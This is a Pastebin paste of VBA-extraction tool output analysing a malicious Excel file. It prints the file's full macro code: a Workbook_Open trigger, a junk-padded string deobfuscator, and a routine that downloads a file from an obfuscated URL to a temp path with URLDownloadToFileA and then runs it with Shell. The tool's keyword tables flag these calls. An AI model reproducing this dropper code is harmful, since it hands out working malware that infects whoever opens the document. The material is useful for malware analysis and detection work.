SHARE
TWEET

Malicious Excel macro

dynamoo Feb 25th, 2015 304 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. Flags       Filename                                                        
  2. ----------- -----------------------------------------------------------------
  3. OLE:MAS---- car015~1.xls
  4.  
  5. (Flags: OpX=OpenXML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
  6.  
  7. ===============================================================================
  8. FILE: car015~1.xls
  9. Type: OLE
  10. -------------------------------------------------------------------------------
  11. VBA MACRO ÝòàÊíèãà.cls
  12. in file: car015~1.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u042d\u0442\u0430\u041a\u043d\u0438\u0433\u0430'
  13. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  14. Sub Workbook_Open()
  15. jQ5
  16. End Sub
  17. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  18. ANALYSIS:
  19. +----------+---------------+----------------------------------------+
  20. | Type     | Keyword       | Description                            |
  21. +----------+---------------+----------------------------------------+
  22. | AutoExec | Workbook_Open | Runs when the Excel Workbook is opened |
  23. +----------+---------------+----------------------------------------+
  24. -------------------------------------------------------------------------------
  25. VBA MACRO Ëèñò1.cls
  26. in file: car015~1.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u041b\u0438\u0441\u04421'
  27. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  28. (empty macro)
  29. -------------------------------------------------------------------------------
  30. VBA MACRO Ëèñò2.cls
  31. in file: car015~1.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u041b\u0438\u0441\u04422'
  32. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  33. (empty macro)
  34. -------------------------------------------------------------------------------
  35. VBA MACRO Ëèñò3.cls
  36. in file: car015~1.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u041b\u0438\u0441\u04423'
  37. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  38. (empty macro)
  39. -------------------------------------------------------------------------------
  40. VBA MACRO Class1.cls
  41. in file: car015~1.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Class1'
  42. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  43. (empty macro)
  44. -------------------------------------------------------------------------------
  45. VBA MACRO Class2.cls
  46. in file: car015~1.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Class2'
  47. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  48. (empty macro)
  49. -------------------------------------------------------------------------------
  50. VBA MACRO Class3.cls
  51. in file: car015~1.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Class3'
  52. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  53. (empty macro)
  54. -------------------------------------------------------------------------------
  55. VBA MACRO Module1.bas
  56. in file: car015~1.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Module1'
  57. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  58.  
  59. Public Function vxRuzMJsFffGPcDYCb(AUKBPaIIvwQgsU As String) As String
  60. GoTo jvLMiktQy
  61. jvLMiktQy:
  62. GoTo YexFubVVUa
  63. YexFubVVUa:
  64. For SrJVJGASPnQ = 1 To Len(AUKBPaIIvwQgsU) Step 2
  65. GoTo pPBRUYPoRwgcQlcS
  66. pPBRUYPoRwgcQlcS:
  67. GoTo ZZMyawIQEV
  68. ZZMyawIQEV:
  69. GoTo maQQjhDZxDzLOdzA
  70. maQQjhDZxDzLOdzA:
  71. GoTo OsHauNHxdmnlqbTbFSR
  72. OsHauNHxdmnlqbTbFSR:
  73. GoTo ogETMxfh
  74. ogETMxfh:
  75. vxRuzMJsFffGPcDYCb = vxRuzMJsFffGPcDYCb & Mid(AUKBPaIIvwQgsU, SrJVJGASPnQ, 1)
  76. GoTo wGcpdOq
  77. wGcpdOq:
  78. Next
  79. GoTo UmYcCdoiA
  80. UmYcCdoiA:
  81. GoTo pOGCNfuPDMkfIKrKQZN
  82. pOGCNfuPDMkfIKrKQZN:
  83. GoTo DBGekrVjiyCEw
  84. DBGekrVjiyCEw:
  85. GoTo dNvxRuzM
  86. dNvxRuzM:
  87. GoTo FffGPcDYCb
  88. FffGPcDYCb:
  89. GoTo tEyQzQGQQSfvKRTdAv
  90. tEyQzQGQQSfvKRTdAv:
  91. End Function
  92.  
  93. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  94. ANALYSIS:
  95. No suspicious keyword or IOC found.
  96. -------------------------------------------------------------------------------
  97. VBA MACRO Class4.cls
  98. in file: car015~1.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Class4'
  99. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  100. (empty macro)
  101. -------------------------------------------------------------------------------
  102. VBA MACRO Class5.cls
  103. in file: car015~1.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Class5'
  104. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  105. (empty macro)
  106. -------------------------------------------------------------------------------
  107. VBA MACRO Class6.cls
  108. in file: car015~1.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Class6'
  109. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  110. (empty macro)
  111. -------------------------------------------------------------------------------
  112. VBA MACRO dfgfdg.bas
  113. in file: car015~1.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/dfgfdg'
  114. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  115. #If VBA7 Then
  116.     Private Declare PtrSafe Function FnjkHBKJBl Lib "urlmon" Alias _
  117.     "URLDownloadToFileA" (ByVal sdfFFF As LongPtr, _
  118.     ByVal kJNJKBl As String, _
  119.     ByVal ghjVFF As String, _
  120.     ByVal BGgdhF As Long, _
  121.     ByVal VVgfh As LongPtr) As LongPtr
  122. #Else
  123.     Private Declare Function FnjkHBKJBl Lib "urlmon" Alias _
  124.     "URLDownloadToFileA" (ByVal sdfFFF As Long, _
  125.     ByVal kJNJKBl As String, _
  126.     ByVal ghjVFF As String, _
  127.     ByVal BGgdhF As Long, _
  128.     ByVal VVgfh As Long) As Long
  129. #End If
  130. Sub jQ5()
  131. mog4O4d49 vxRuzMJsFffGPcDYCb("h@t?t^pJ:P/@/pjCac{eXkBhioWnEd`eslR.Rw9.9inn~t2ehr*ifa1.SpjlS/NjCsf/`b(imn.)e…x8eX"), Environ(vxRuzMJsFffGPcDYCb("TgMJPW")) & vxRuzMJsFffGPcDYCb("\eG…HUjSkrd_fdgT.„eXx/e+")
  132. End Sub
  133. Function mog4O4d49(Mh9_094suu As String, R4_t As String) As Boolean
  134. vJHKBJdfkgfg = FnjkHBKJBl(0&, Mh9_094suu, R4_t, 0&, 0&)
  135. Dim j_W8
  136. j_W8 = Shell(R4_t, 1)
  137. End Function
  138.  
  139.  
  140.  
  141.  
  142. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  143. ANALYSIS:
  144. +------------+--------------------+-----------------------------------------+
  145. | Type       | Keyword            | Description                             |
  146. +------------+--------------------+-----------------------------------------+
  147. | Suspicious | Lib                | May run code from a DLL                 |
  148. | Suspicious | Shell              | May run an executable file or a system  |
  149. |            |                    | command                                 |
  150. | Suspicious | Environ            | May read system environment variables   |
  151. | Suspicious | URLDownloadToFileA | May download files from the Internet    |
  152. +------------+--------------------+-----------------------------------------+
  153. -------------------------------------------------------------------------------
  154. VBA MACRO Class7.cls
  155. in file: car015~1.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Class7'
  156. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  157. (empty macro)
  158. -------------------------------------------------------------------------------
  159. VBA MACRO Module2.bas
  160. in file: car015~1.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Module2'
  161. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  162. (empty macro)
  163. -------------------------------------------------------------------------------
  164. VBA MACRO Class8.cls
  165. in file: car015~1.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Class8'
  166. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  167. (empty macro)
  168. -------------------------------------------------------------------------------
  169. VBA MACRO Class9.cls
  170. in file: car015~1.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Class9'
  171. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  172. (empty macro)
  173. -------------------------------------------------------------------------------
  174. VBA MACRO Class10.cls
  175. in file: car015~1.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Class10'
  176. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  177. (empty macro)
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!
 
Top